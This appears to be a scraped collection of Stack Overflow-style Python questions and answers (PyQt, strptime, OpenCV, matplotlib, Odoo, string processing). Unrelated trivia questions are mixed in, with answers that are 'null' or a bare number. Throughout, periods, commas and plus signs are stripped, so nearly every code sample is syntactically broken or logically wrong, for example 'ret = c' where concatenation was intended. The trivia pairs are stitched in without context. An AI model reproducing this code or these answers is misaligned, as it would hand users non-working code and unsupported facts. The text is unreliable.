Set PyQt QLabel to display peerAddress after connected to a server I try to make simple operation in PyQt4 After a client connects to a server I want to change a text in a label to show an address of the server ````def connectToServer(self): self connectButton setEnabled(False) self socket connectToHost(HOST PORT) print(self socket peerAddress()) try: self lblSrvConnected setText(self socket peerAddress()) # changes lbl to address except: self lblSrvConnected setText('Some error') ```` The print statement gives `<PyQt4 QtNetwork QHostAddress object at 0x02C23DB0&gt;` and the label always changes to `Some error` from `expect` I tried to do conversion to string with `str()` use `peerAddress` without bracket etc When I call `peerName()` instead of `peerAddress()` it prints `localhost` but `peerPort()` gives `0` instead of the port I use I expect I have two problems First I cannot get out address and port from peerAddress I tried assign it to variables but then have an error: `TypeError: QHostAddress' object is not iterable` Second I expect I try to change the label before connection is established I tried with ` waitForConnected()` but cannot make it that way either I cannot find how to make it working
Try: <blockquote> <strong>QHostAddress toString (self)</strong> Returns the address as a string For example if the address is the IPv4 address 127 0 0 1 the returned string is "127 0 0 1" For IPv6 the string format will follow the RFC5952 recommendation </blockquote> from documentation QT4
Reading a file and storing contents into a dictionary - Python I am trying to store contents of a file into a dictionary and I want to return a value when I call its key Each line of the file has two items (acronyms and corresponding phrases) that are separated by commas and there are 585 lines I want to store the acronyms on the left of the comma to the key and the phrases on the right of the comma to the value Here is what I have: ````def read_file(filename): infile = open(filename 'r') for line in infile: line = line strip() #remove newline character at end of each line phrase = line split(' ') newDict = {'phrase[0]':'phrase[1]'} infile close() ```` And here is what I get when I try to look up the values: ````&gt;&gt;&gt; read_file('acronyms csv') &gt;&gt;&gt; acronyms=read_file('acronyms csv') &gt;&gt;&gt; acronyms['ABOUT'] Traceback (most recent call last): File "<pyshell#65&gt;" line 1 in <module&gt; acronyms['ABOUT'] TypeError: 'NoneType' object is not subscriptable &gt;&gt;&gt; ```` If I add `return newDict` to the end of the body of the function it obviously just returns `{'phrase[0]':'phrase[1]'}` when I call `read_file('acronyms csv')` I have also tried `{phrase[0]:phrase[1]}` (no single quotation marks) but that returns the same error Thanks for any help
````def read_file(filename): infile = open(filename 'r') newDict = {} for line in infile: line = line strip() #remove newline character at end of each line phrase = line split(' ' 1) # split max of one time newDict update( {phrase[0]:phrase[1]}) infile close() return newDict ```` Your original creates a new dictionary every iteration of the loop
Convert String to Python datetime Object without Zero Padding I am using python 3 5 I have a string formatted as `mm/dd/yyyy H:MM:SS AM/PM` that I would like as a python datetime object Here is what I have tried ```` date = "09/10/2015 6:17:09 PM" date_obj = datetime datetime strptime(date '%d/%m/%Y %I:%M:%S %p') ```` But this gets an error because the hour is not zero padded The formatting was done per the table on the <a href="https://docs python org/3 5/library/datetime html#strftime-and-strptime-behavior" rel="nofollow">datetime documentation</a> which does not allow the hour to have one digit I have tried splitting the date up adding a zero and then reassembling the string back together while this works this seems less robust/ideal ```` date = "09/10/2015 6:17:09 PM" date = date split() date = date[0] " 0" date[1] " " date[2] ```` Any recommendation on how to get the `datetime` object directly or a better method for padding the hour would be helpful Thank you
There is nothing wrong with this code: ````&gt;&gt;&gt; date = "09/10/2015 6:17:09 PM" &gt;&gt;&gt; date_obj = datetime datetime strptime(date '%m/%d/%Y %I:%M:%S %p') &gt;&gt;&gt; date_obj datetime datetime(2015 9 10 18 17 9) &gt;&gt;&gt; print(date_obj) 2015-09-10 18:17:09 ```` The individual attributes of the `datetime` object are integers not strings and the internal representation uses 24hr values for the hour Note that I have swapped the day and month in the format strings as you state that the input format is `mm/dd/yyyy` But it seems that you actually want it as a string with zero padded hour so you can use `datetime strftime()` like this: ````&gt;&gt;&gt; date_str = date_obj strftime('%m/%d/%Y %I:%M:%S %p') &gt;&gt;&gt; print(date_str) 09/10/2015 06:17:09 PM # or if you actually want the output format as %d/%m/%Y &gt;&gt;&gt; print(date_obj strftime('%d/%m/%Y %I:%M:%S %p')) 10/09/2015 06:17:09 PM ````
How much does the SNES unit weigh in pounds?
null
run a file gms from python script I need to create a python script that runs a file gams (myfile gms) My file is in a folder `F:\Otim\correct` so I was using a part of a code that I saw in this forum I made: ```` import subprocess subprocess check_call(["F:\Otim\correct\myfile gms"]) ```` and I get an error: ````Runtime error Traceback (most recent call last): File "<string&gt;" line 80 in <module&gt; File "C:\Python27\ArcGIS10 2\Lib\subprocess py" line 506 in check_call retcode = call(*popenargs **kwargs) File "C:\Python27\ArcGIS10 2\Lib\subprocess py" line 493 in call return Popen(*popenargs **kwargs) wait() File "C:\Python27\ArcGIS10 2\Lib\subprocess py" line 679 in __init__errread errwrite) File "C:\Python27\ArcGIS10 2\Lib\subprocess py" line 896 in _execute_child startupinfo) WindowsError: [Error 193] %1 is not a valid Win32 application ```` Can someone help me please? Thanks
I have never used gams but after a quick look at www gams com it sounds like myfile gms is not the file to be executed but the input file to be given as argument to the gams executable So you should try something like : ````import subprocess subprocess check_call([r"C:\path\to\programs\GAMS exe" r"F:\Otim\correct\myfile gms"]) ```` Notice : there is a GAMS python API which could give you a more portable solution
Placing a graph on a 2d array I have a graph that consists of nodes and connections Each node has a list of every other node it is connected to like the object: ````class Node(): def __init__(self): self connections = [] def connect(self node): self connections append(node) node connections append(self) ```` This is a simplified version of my node class These nodes are connected in a tree-like structure - no loop connections How would I go about turning a graph like a-b   /f /h  \c-d-e-g into a 2d array like ````[[a b f h] [c d e g]] ```` The array does not have a size limit but the array produced should be somewhat condensed Extra nodes can be created to be used as filler if it is required This is the opposite of what questions that ask for a maze to be converted into a graph are asking for
- Work out preference order of direction (N E S W) - For any node with more than 4 connections: - Add new 'connection' node - While overflowing node has more than 4 connections - If node not parsed and not just created node - Disconnect from overflowing node - Connect to new node - Place start node at 0 0 - Set current node to one done last - For each connecting node - If direction would prefer empty? Y: Place node in space goto 4 - Repeat for all other preferences in order - If all connections full undo all and return bad
What is the percentage of non-repetitive DNA in E. coli?
null
Using SimpleHTTPServer to interpret failed requests and dynamically create JSON pages? I have a python program that takes and validates user input <strong><them>(flightNumber dateStamp)</them></strong> and performs three api lookups: ````1 get flight info 2: find flightId 3: track flightID and return up to date JSON ```` I should now like to make this information available to the web at ````mysite com/flightNumber/dateStamp ```` to any user passing a <strong><them>'Valid'</them></strong> flightNumber and dateTime Is it possible to: Setup a SimpleHTTPServer at mysite com and log all paths attempted When a connection is made to any path it will fail as there is nothing there (unless/until I cache) But I simply send a user a hold message use are' Python script to check if the url is <strong><them>'Valid'</them></strong> (flightNumber dateStamp) If not <strong><them>'Valid'</them></strong> I return an error If <strong><them>'Valid'</them></strong> I parse the relevant url info into parts of my existing program The results I get back from my existing api calls create a JSON readable page at ```` /flightNumber/dateStamp ```` Now I forward the user to the page Is this possible? it seems an interesting way to achieve what I am after
Yes this all sounds possible even pretty simple especially given the lack of detail you have provided
As technology increased what was the amount of bombs that could be dropped in 1937 per day?
644
Python referring to an item in a list from another list I have a list of variables (listA) from from another list (listB) The problem I am having is that the items from listB are being passed by value to listA rather than by reference Is there anyway I can access the the object in listB after having put its value in listA? For example: ````listB = [1 2 3 4 5] listA = [listB[0] listB[1]] listA[0] = 0 ```` this makes listA equal to [0 2] and leaves listB unchanged I would like to modify listB so that it becomes [0 2 3 4 5] I have of course come up with a solution to this but its ugly and I was wondering if there was an elegant way of doing this
Everything in python is a reference After all those statements are executed `listB[1]` and `listA[1]` are <them>literally</them> the same object (you can check by calling `id(listB[1])` and `id(listA[1])` The reason `listA[0]` and `listB[0]` are different is merely because you put a different reference into that spot Judging from your description you do not want to a `listA` that stores references to the objects in `listB` What you want is a `listA` that is a <them>view</them> of `listB` I believe you have only two options: - Create a special sequence that internally stores a reference to `listA` and whose `__getitem__` and `__setitem__` methods perform lookups into `listA` when invoked - Create special a special reference types that contains something like a "sequence and index" Put these references into `listA` But to modify `listB` through `listA` you will have to invoke some sort of "get" and "set" members of these reference objects
auto detect face and take a snapshot with opencv i am working on face recognition project with my college what i am trying to take a snapshot and save it if the face is detected automatically before closing the webcam what I have now is open cam and wait if face is detected and press "q" to take snapshot and save the image Here is the code: ````import numpy as np import cv2 import time #import the cascade for face detection face_cascade = cv2 CascadeClassifier('haarcascade_frontalface_default xml') def TakeSnapshotAndSave(): # access the webcam (every webcam has a number the default is 0) cap = cv2 VideoCapture(0) while(True): # Capture frame-by-frame ret frame = cap read() # to detect faces in video gray = cv2 cvtColor(frame cv2 COLOR_BGR2GRAY) faces = face_cascade detectMultiScale(gray 1 3 5) for (x y w h) in faces: cv2 rectangle(frame (x y) (x+w y+h) (255 0 0) 2) roi_gray = gray[y:y+h x:x+w] roi_color = frame[y:y+h x:x+w] x = 0 y = 20 text_color = (0 255 0) # write on the live stream video cv2 putText(frame "Press q when ready" (x y) cv2 FONT_HERSHEY_PLAIN 1 0 text_color thickness=2) # if you want to convert it to gray uncomment and display gray not fame #gray = cv2 cvtColor(frame cv2 COLOR_BGR2GRAY) # Display the resulting frame cv2 imshow('frame' frame) # press the letter "q" to save the picture if cv2 waitKey(1) &amp; 0xFF == ord('q'): # write the captured image with this name cv2 imwrite('try jpg' frame) break # When everything done release the capture cap release() cv2 destroyAllWindows() if __name__ == "__main__": TakeSnapshotAndSave() ```` thank you in advance
Perform imwrite() in the for (x y w h) in faces: loop itself If you use a constant filename your last detected face will be saved and the rest will be overwritten
How to install PIL (or any module really) to the raspberry pi? I want to install PIL and python-numpy at the least I want to turn an image into an array but really cannot seem to find info on installing/using modules to raspberry pi Could somebody just explain?
Assuming that you are using the Raspberry Pi Foundation's recommended Raspbian image those packages are available through the package manager For numpy you want to run this as root using sudo if appropriate: ````apt-get install python-numpy ```` Installing PIL is similar; just find the package name for PIL and apt-get it I do not know it myself but using "apt-cache search " and grep will find it for you fairly quickly
python syntax datetime Why is the date output formats different between these two codes? One is the datetime object the other one seems to be a string (I prefer the string look alike format) What am I missing? ````def generator(): i=0 while (i<50000): yield random randint(-1 1) datetime datetime now() i=i+1 mynumber = 100 for random_number current_time in generator(): mynumber = random_number print mynumber " " current_time ```` Output: ````&gt;&gt;&gt; 100 2013-04-04 09:16:55 730000 101 2013-04-04 09:16:55 746000 ```` Second example: ````def test(timestamp interval = 1*60): xt = datetime datetime(2013 4 4) #dt = datetime datetime strptime(timestamp '%d/%m/%Y %H:%M:%S') dt=timestamp delta_second =(dt - xt) seconds normalize_second = (delta_second / interval) * interval newtime = xt timedelta(seconds=normalize_second) print (dt newtime) test(datetime datetime now()) ```` ``` >>> (datetime datetime(2013 4 4 9 21 12 386000) datetime datetime(2013 4 4 9 21)) ```
You are printing <them>different things</them> In the first example you print the datetime <them>directly</them> so `print` converts it to `str()` In the second example you print a <them>tuple</them> and tuples always are printed with the contents as `repr()` instead: ````&gt;&gt;&gt; now = datetime datetime now() &gt;&gt;&gt; print now 2013-04-04 10:28:10 029566 &gt;&gt;&gt; print (now ) # tuple (datetime datetime(2013 4 4 10 28 10 29566) ) &gt;&gt;&gt; print repr(now) datetime datetime(2013 4 4 10 28 10 29566) ```` In both cases you are still printing a `datetime` object
How to retrive values in Many2one field as selection field? How to retrieve values on Many2one field using OnChange ? the student should be registered in one standard and one group the standard have multi groups so i want that when i change the field standard the group field should be updated with the groups in that standard When i try to do so it gives me an error ````'Expected singleton: fci standard groups(3 4 5 6)' ```` I am trying that when i change the standard field the group field will be updated to select only groups in this standard Here is my fields ````'standard_id': fields many2one('fci standard' string='Standard' required=True) 'group_id': fields many2one('fci standard groups' string='Standard Group') ```` Here is my function ````def on_change_standard(self cr uid ids standard_id context=None): val = {} if not standard_id: return {} student_obj = self pool get('fci standard') student_data = student_obj browse(cr uid standard_id context=context) val update({'group_id': student_data groups_ids id}) return {'value': val} ```` and here is my xml ````<field name="standard_id" on_change="on_change_standard(standard_id)" widget="selection"/&gt; <field name="group_id" widget="selection"/&gt; ````
No need to write on change method for that you can achieve this by apply domain to that field Try following ````<field name="standard_id" widget="selection"/&gt; <field name="group_id" widget="selection" domain="[('standard_id' '=' standard_id)]"/&gt; ````
Add features to all child classes in python module I would like to update some parent class in a python module to add a feature to all children classes The module is installed via `pip` If I can modify the parent class I just add methods to it But I should not edit installed modules (following my previous <a href="http://stackoverflow com/questions/35909158/manage-python-modules-repeatedly-updated-in-both-local-and-original-repository">discussion</a>) How can I add a feature to all children classes inside a python package without editing files inside pip package directories? One alternative is using <a href="http://stackoverflow com/questions/3765222/monkey-patch-python-class">monkeypatching</a> but seems too tricky <h3>Update</h3> Concrete situation is that I would like to add common method to `Child1` and `Child2` but can not edit Parent because it is a class of a `pip` package ````class Parent: class Child1(Parent): class Child2(Parent): ````
````class Parent: class Mixin: def common_method (self ): class Child1 (Parent Mixin): class Child2 (Parent Mixin): ```` OR ````class Parent: class Augmented (Parent): def common_method (self ): class Child1 (Augmented): class Child2 (Augmented): ````
Looping and Naming Variables in Python Bar Chart I am using matplotlib in Python to create a stacked bar chart showing order volume over the course of the day by hour versus a calendar equivalent day last year I have already arranged an array that includes today's and last year's order volume: ````allorders=[(23 28) (15 7) (15 5) (8 9) (4 2) (5 3) (4 6) (8 10) (28 24) (45 46) (55 65) (0 74) (0 64) (0 58) (0 62) (0 62) (0 42) (0 43) (0 38) (0 39) (0 32) (0 40) (0 41) (0 16)] ```` For stacked bars you would normally use the following syntax: ````import matplotlib pyplot as plt import numpy as np n=2 ind = np arange(n) width = 0 35 plt ylabel('Orders') plt xticks(ind+width/2 ('Today' 'Last Year on Calendar Equivalent')) plt yticks(np arange(0 plottotal 10)) p1= plt bar(ind allorders[0] width color='#000099') p2= plt bar(ind allorders[1] width color='#000099' bottom=allorders[0]) ```` however this can be daunting with large amount of stacked charts Therefore I am trying to create a loop to go through the 'allorders' array and stack them via: ```` for i in allorders: if i=0: p1=plt bar(ind allorders[i] width color='#000099') bottomcounter=allorders[i] else: 'p+i' = plt bar(ind allorders[i] width color='r' bottom=bottomcounter) bottomcounter=bottomcounter+allorders[i] ```` but I get all sorts of errors including that the clause 'if i=0' has invalid syntax and that 'p+i'cannot be used to auto-name variables So SO wizards: 1) how do you name new variables automatically in a loop (so when i=0 the variable is named p0 when i=1 the variable is named p1 etc ) 2) what is wrong with including the 'if i=0' clause? Since I am new to Python (coming from R and Stata) please treat me like an infant with step-by-step code if you can! Thanks!
To start with you need to read and understand the official <a href="http://docs python org/2/tutorial/" rel="nofollow">tutorial</a> Second to fix your code: ````import itertools allorders=[(23 28) (15 7) (15 5) (8 9) (4 2) (5 3) (4 6) (8 10) (28 24) (45 46) (55 65) (0 74) (0 64) (0 58) (0 62) (0 62) (0 42) (0 43) (0 38) (0 39) (0 32) (0 40) (0 41) (0 16)] width = 35 plts = [] colors = ['k' 'r' 'b'] for i order in enumerate(allorders): bottom_counter = 0 loc_plts = [] for o c in zip(order itertools cycle(colors)): tmp_plt = plt bar(i o width color=c bottom=bottom_counter) loc_plts append(tmp_plt) bottom_counter+=o plts append(loc_plts) ````
dev_appserver py does nothing Currently I am new to appengine with python and now I am following this tutorial <a href="https://cloud google com/appengine/docs/python/gettingstartedpython27/creating-guestbook#objectives" rel="nofollow">https://cloud google com/appengine/docs/python/gettingstartedpython27/creating-guestbook#objectives</a> Somehow when I run dev_appserver py / as stated in the tutorial it just does nothing <a href="http://i stack imgur com/tiBxC png" rel="nofollow"><img src="http://i stack imgur com/tiBxC png" alt="enter image description here"></a> And I already have my environment variables set up also <a href="http://i stack imgur com/xi6Vb png" rel="nofollow"><img src="http://i stack imgur com/xi6Vb png" alt="enter image description here"></a> Am I missing something? I use windows by the way
I solved on it on my own guys I was using gitbash so I switched to cmd and removed the slash at the end and it worked
matplotlib legend background color Is there while `rcParams['legend frameon'] = 'False'` a simple way to fill the legend area background with a given colour More specifically I would like the grid not to be seen on the legend area because it disturbs the text reading The keyword `framealpha` sounds like what I need but it does not change anything ````import matplotlib as mpl import matplotlib pyplot as plt mpl rcParams['legend frameon'] = 'False' plt plot(range(5) label = you"line") plt grid(True) plt legend(loc = best) plt show() ```` I have also tried: ````legend = plt legend(frameon = 1) frame = legend get_frame() frame set_color('white') ```` but then I need to ask how can I change the background colour while keeping the frame on? Sometimes I want it ON with a background colour other than white And also is there a way of changing the colour of the frame? With the above code I was expecting to change the colour of the frame only not the background
You can set the edge color and the face color separately like this: ````frame set_facecolor('green') frame set_edgecolor('red') ```` There is more information under FancyBboxPatch <a href="http://matplotlib org/api/artist_api html">here</a>
What are state constitutional amendments relating to separation of church and state known as?
Blaine Amendments
TypeError: unsupported operand type(s) for *: 'int' and 'function' Not seeing why and which one is a function I cannot figure out why I am getting an error with having an int and a function multiplying ````File "E:/Fundamentals of Programming/Programs/polygon_area py" line 23 in polygon_area area = (num_sides * side_length * side_length) / \ TypeError: unsupported operand type(s) for *: 'int' and 'function' ```` Code: ````#this program computes #the area of polygons import math def main(): get_side_length() side_length = get_side_length report(side_length) def report(side_length): print('side length \t number of sides \t area') for i in range(3 10): num_sides = i polygon_area(num_sides side_length) area = polygon_area print(side_length '\t' num_sides '\t' area) def polygon_area(num_sides side_length): area = (num_sides * side_length * side_length) / \ (4 * math tan(math pi / num_sides)) return area def get_side_length(): int(input('Input the length of a side ')) return get_side_length #start program main() ````
I am sorry for not having read your code carefully You may need to know that a function should return something And in your `get_side_length` for example the result which is an integer should be returned I have changed your code which should work now ````#this program computes #the area of polygons import math def main(): side_length = get_side_length() # get_side_length returns an integer and assigns it to side_length report(side_length) def report(side_length): print('side length \t number of sides \t area') for i in range(3 10): num_sides = i area = polygon_area(num_sides side_length) # polygon_area returns an number representing the area and assigns it to area print(side_length '\t' num_sides '\t' area) def polygon_area(num_sides side_length): area = (num_sides * side_length * side_length) / \ (4 * math tan(math pi / num_sides)) return area def get_side_length(): return (input('Input the length of a side ')) # you get an integer from input and should return it ````
Remove repeating spaces manually in a string I have a question about a certain piece of code I was doing an exercise in python about strings I had come up with the correct logic but for some reason the output inside the for loop is not returning correctly Instead the global value gets returned I am not too familiar with Python but is there some way to fix this? ````def song_decoder(song): global Ret Ret = "" Ret = song replace("WUB" " ") Ret = Ret strip() Ret = "1" space = False for i in range(0 len(Ret)): if Ret[i] == "1": Ret = Ret[:i] break elif Ret[i] == " ": if space is False: space = True else: if i+1 == len(Ret): Ret = Ret[:i] else: Ret = Ret[:i] Ret[(i+1):] else: space = False return Ret ```` Test code: ````def test_song_decoder(self): self assertEquals(song_decoder("AWUBBWUBC") "A B C" "WUB should be replaced by 1 space") self assertEquals(song_decoder("AWUBWUBWUBBWUBWUBWUBC") "A B C" "multiples WUB should be replaced by only 1 space") self assertEquals(song_decoder("WUBAWUBBWUBCWUB") "A B C" "heading or trailing spaces should be removed") ```` The second test fails and `'A B C'` is returned instead
First of all there is no need for you to make `Ret` global here So better remove that line Second there is one test missing which will give you another hint: ````&gt;&gt;&gt; song_decoder("AWUBBWUBC") 'A B C' &gt;&gt;&gt; song_decoder("AWUBWUBBWUBWUBC") 'A B C' &gt;&gt;&gt; song_decoder("AWUBWUBWUBBWUBWUBWUBC") 'A B C' ```` As you can see two `WUB`s are correctly replaced by only one space The problem appears when there are three This should give you a hint that the space detection doesn’t work correctly after you have made a replacement The reason for this is actually rather simple: ````# you iterate over the *initial* length of Ret for i in range(0 len(Ret)): # elif Ret[i] == " ": if space is False: space = True else: # when you hit a space and you have seen a space directly # before then you check the next index… if i+1 == len(Ret): Ret = Ret[:i] else: # … and remove the next index from the string Ret = Ret[:i] Ret[(i+1):] # now at the end of the loop `i` is incremented to `i 1` # although you have already removed the character at index `i` # making the next character you would have to check belong to # index `i` too ```` So the result is that you skip over the character that comes directly after the second space (which you remove) So it’s impossible to detect three spaces this way because you always skip the third one In general it’s a very bad idea to iterate over something which you modify while doing that In your case you are iterating over the length of the string but the string actually gets shorter all the time So you really should avoid doing that Instead of iterating over the `Ret` string you should iterate over the original string which you keep constant: ````def song_decoder(song): # replace the WUBs and strip spaces song = song replace("WUB" " ") strip() ret = '' space = False # instead of iterating over the length just iterate over # the characters of the string for c in song: # since we iterate over the string we don’t need to check # where it ends # check for spaces if c == " ": # space is a boolean so don’t compare it against booleans if not space: space = True else: # if we saw a space before and this character is a space # we can just skip it continue else: space = False # if we got here we didn’t skip a later space so we should # include the current character ret = c return ret ````